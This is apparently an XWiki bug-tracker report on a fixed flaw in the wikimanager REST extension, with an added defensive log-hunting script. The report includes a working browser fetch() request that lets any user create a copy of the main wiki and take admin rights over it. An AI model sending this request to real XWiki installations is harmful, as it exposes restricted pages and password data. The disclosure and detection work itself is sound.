Details
- Bug
- Resolution: Fixed
- Blocker
- 5.4-rc-1
- Integration
- Unknown
- N/A
Description
Steps to reproduce:
As any user (guest, regular user, ...) on a wiki where org.xwiki.platform:xwiki-platform-wiki-rest-default is installed execute the following code on any page in your browser's console:
fetch('/xwiki/rest/wikimanager?template=xwiki', {
    method: 'POST',
    headers: { "Content-Type": "text/xml" },
    body: '<wiki xmlns="http://www.xwiki.org"><id>testwiki</id><name>testwiki</name><description>Some description of the test wiki</description></wiki>'
  })
  .then(response => response.text().then(console.log))
  .catch(console.log)
Expected result:
An error is logged that the user doesn't have the rights to create a wiki.
Actual result:
A new wiki is created that contains a copy of the main wiki. The current user becomes the owner of that wiki and therefore has admin rights on it, so they can see all of its contents, including pages they previously couldn't access, password fields, etc.
This attack can even be executed on a wiki where read access is denied on all pages, but in that case the created wiki most likely cannot be accessed.
Note that the wikimanager REST API isn't installed by default, so most XWiki installations aren't vulnerable to this attack.
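For administrators who had the wikimanager REST extension installed before upgrading, the practical question is whether the endpoint was used to create wikis. The following is an added example for hunting that in web-server access logs; it is not part of the bug report or of XWiki's own code. It assumes the servlet container writes Combined Log Format lines (the sample lines below are constructed, not real logs) and that the resource path ends in /rest/wikimanager as in the report above; the context path and the admin account names are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Combined Log Format (Tomcat's AccessLogValve
# "combined" pattern). These are invented for the example, not real logs.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Feb/2014:10:12:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 14231 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Feb/2014:10:12:09 +0000] "POST /xwiki/rest/wikimanager?template=xwiki HTTP/1.1" 200 412 "http://wiki.example.test/xwiki/bin/view/Main/" "Mozilla/5.0"
10.0.0.7 - admin [03/Feb/2014:10:13:44 +0000] "POST /xwiki/rest/wikimanager?template=xwiki HTTP/1.1" 200 415 "-" "curl/7.30"
10.0.0.9 - - [03/Feb/2014:10:14:02 +0000] "GET /xwiki/rest/wikis HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Feb/2014:10:14:30 +0000] "POST /xwiki/rest/wikimanager HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# host, ident, remote user, timestamp, request line, status; the rest is ignored.
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line; return a dict or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_wiki_creations(log_text, known_admins=frozenset()):
    """Return one record per POST to the wikimanager REST resource.

    Only POST is a creation attempt (that is what the report reproduces).
    The remote-user field is filled in only when the container itself
    authenticates the request; on most XWiki deployments it stays "-", so a
    hit must be correlated with the owner recorded on any newly created wiki.
    """
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        url = urlsplit(rec["path"])
        if not url.path.endswith("/rest/wikimanager"):
            continue
        template = parse_qs(url.query).get("template", [None])[0]
        user = None if rec["user"] == "-" else rec["user"]
        events.append({
            "host": rec["host"],
            "user": user,
            "time": rec["time"],
            "status": rec["status"],
            "template": template,
            # 2xx means the server accepted the request; the report's exploit
            # path returns the created wiki, so treat these as likely creations.
            "succeeded": 200 <= rec["status"] < 300,
            # Anything not from a known admin account needs a closer look.
            "suspicious": user not in known_admins,
        })
    return events


def summarize(events):
    """Count creation attempts per (source host, remote user) pair."""
    counts = defaultdict(int)
    for e in events:
        counts[(e["host"], e["user"])] += 1
    return dict(counts)


if __name__ == "__main__":
    hits = find_wiki_creations(SAMPLE_LOG, known_admins=frozenset({"admin"}))
    for e in hits:
        flag = "SUSPICIOUS" if e["suspicious"] else "ok"
        print(f'{e["time"]} {e["host"]} user={e["user"]} status={e["status"]} '
              f'template={e["template"]} {flag}')
    print(summarize(hits))
```

Run it against the real access logs covering the period the extension was installed; any 2xx hit not attributable to an administrator should be matched against the list of wikis present in the database, since the report notes the requesting user becomes the owner of the created wiki.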